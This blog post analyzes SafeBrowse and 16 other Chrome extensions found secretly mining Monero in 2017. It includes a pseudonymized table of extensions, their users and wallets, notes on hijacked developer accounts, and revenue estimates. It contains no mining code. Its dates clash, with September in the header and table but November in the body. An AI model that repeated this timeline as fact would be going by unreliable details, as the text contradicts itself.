Posted on by Achim D. Brucker, licensed under CC BY-ND 4.0.

It's More Than One - Monero Mining Chrome Extensions

During the last days, a researcher discovered that the SafeBrowse Chrome extension is using the computer of its users to mine Monero (an alternative crypto currency similar to Bitcoin). With over 140000 users - most likely, this is the most popular (and probably the first one) Chrome extension mining a cyrpto currency without users’ consent. it is not the only one …

The Details

As of today (23rd of September 2017), there are at least 16 other extensions that apply the same technique without informing their users (and we found two extensions that use the same technique for raising money for charities.):

Id User Available First Mining Last Update Category Author Wallet
jjc 21109 02-01 09-20 09-21 Shopping A u19
gmc 14125 02-01 09-19 09-21 Productivity B BPZ
nnj 7591 02-01 09-20 09-20 Fun C m3a
ajo 4346 05-20 09-20 09-19 Soc. & Com. D zzF
beh 3939 04-01 09-19 09-19 Soc. & Com. E 7Jj
ahb 1782 04-26 09-19 09-19 Soc. & Com. G YdH
kdp 941 02-23 09-20 09-20 Soc. & Com. H Esa
oem 783 02-01 09-20 09-20 Prod. D m3a
lem 348 02-01 09-20 09-20 Shopping I yRG
iln 226 02-01 09-20 09-20 Dev. Tools J FrY
edk 157 04-24 09-19 09-19 Prod. K 4pH
kil 136 02-01 09-21 09-21 Prod. L 4Qh
eki 28 04-24 09-19 09-19 Fun K 4pH
ioh 19 07-12 09-19 09-20 News & Weather M UJ6
nnh 4 08-05 09-19 09-19 Shopping I yRG
mng 0 09-20 09-20 09-20 Dev. Tools O HZI

In this table, we pseudonymized the extension id (first column), the author (seventh column), and the Monero wallet (last column). Moreover, we report the number of users (second column), when we detected the first as part of our research (third column), the first date (month and day, e.g., 02-01 is 2nd of February) at which we detected Monero mining code as part of the extension (fourth column), the date of the last update (fifth column), and the extension category (sixth column).

Before we dig into the details, let’s be clear: these are all extensions with a comparatively small user base: in total they have less than 56000 users (roughly 40% of the user base of SafeBrowse). Still, analyzing these extensions, as well as SafeBrowse, reveals some interesting insights:

As part of our security research of browser extension, we monitor extensions at least once every 24 hours. Thus, we have data to get more insights into the SafeBrowse incident as well as we are able to check other extension in the Chrome store easily.

  • First, let’s have a look at the data of SafeBrowse:

    • SafeBrowse is a well established and long maintained extensions (it is available since we started to monitor regularly in February 2017)

    • The last time we have seen a non-malicious version of SafeBrowse was on November 19th at 5.30 am. Already on November 20th at 2.51 (i.e., 21 hours later), the extension was removed from the Chrome store. Thus, the whole chain of events from uploading a malicious new version, somebody reporting it to Google, and Google removing the extension from the Chrome store, happened in less than 21 hours.

  • After the publication of the SafeBrowse incident, we analyzed checked the other extensions in the store. In total, we found 16 extensions that mine crypto currencies without user consent. The extensions have between 0 and 21109 users and are offered by various authors in various categories:

    • All extensions got an update containing the mining code between November 19th and November 21st and except for two, all of them where available (without the mining code) for several months prior to the first update containing mining code.

    • While all extension use the same implementation of the actual mining algorithms offered by Con Hive, we found three different implementations (code smells): 14 out of the 16 extensions are using the same client-side mining configuration (except for the actual wallet), whereas two extensions (ajo and jjc) use different variant.

    • Three extensions (gmc, ioh, and jcc) got updates after the mining code was injected for the first time. In these cases, we compared the last non-mining version the first version containing the mining code as well as the updated version containing the mining code:

      • in all cases, the update containing the mining code did not change any feature (neither introduced new features). Thus, the only purpose of these updates is the introduction of the mining code. There is one somewhat funny exception, though, where also messages where translated from German to English. In several cases, inserting the mining code also required changing the permission of the extension.

      • the updates after the first introduction of the mining code modified the mining configuration, i.e., reducing the speed and, thus, reducing the risk of users complaining about a slowing down their devices.

    • While we have no hints that the extensions where modified by their original authors (actually, it seems to be more likely that the accounts of the developers where misused by third parties), it is conspicuous that extensions by the same author use the same Monero wallet while extensions offered by different authors use different wallet.

    • At least one extension is Open Source, i.e., the original author published the source code on GitHub: the GitHub repository does not contain the mining code. This could be another evidence that the malicious updates are have not published by the original authors.

We also found two extensions that mine Monero on purpose - for supporting Charities. This allows users to donate “while browsing the web”. This is, of course, a legitimate use. Interestingly, they use the same mining code as the questionable extensions discussed in the previous section. These two legitimate extensions where published on September 18, respectively, September 22nd. While the one published on September 22nd is, most likely, inspired by the press coverage of the SafeBrowse incident, we cannot answer the question if the legitimate one published on September 18th inspired the misuse of SafeBrowse or not.

How Much Can Be Earned By Mining?

Of course, the final question to answer is “how many money can be made?” This question is not easy to answer. The people at Con Hive claim that ``with just 10–20 active miners on your site, you can expect a monthly revenue of about 0.3 XMR (~$27)’’. Let’s assume this means 20 active miners for 24 hours a day, for each day of the month. As the extensions mine whenever Chrome is showing a website, we might use the average time people spent on the Internet for our further analysis: let’s be optimistic and assume that each user of an extension mines for 120 hours a month (according the the The Telegraph, teenagers use the Internet for more than 27 hours a week). This results in a revenue of ~$22000 for an extension with 100000 users. As the extensions need to mine in the background using as little resources as possible, the actual mining rate of these extension is usually much lower and a more realistic revenue might be more in the area of a few thousand dollars. Still, if Google detects the misuse within less than 21 hours, the possible gains are negligible.

Conclusions

The most important take away is that the reporting mechanism for malicious extension seems to work rather quickly for widely used (more than 100k users) extensions. Still, for extensions with smaller a smaller use base it is more unlikely that sever changes in the intention of the extensions (e.g., after being hijacked) are detected quickly. Moreover, even after an extension was already banned from the store, new updates misusing the same approach can still be published in the Chrome store.

Finally, extensions are not only a juicy target for attackers that want to gain money from mining crypto currencies, they are also gateway for attacks on the security and privacy of browser users. Thus, to minimize the attack surface, we recommend to install as little extensions as possible and use the temporary profile feature of Chrome for testing. Of course, this does not help if an benign extension is hijacked and misused, as it seems to be the case for the extensions discussed in this blog post. Here there situation is much complex - and we will discuss this in future articles.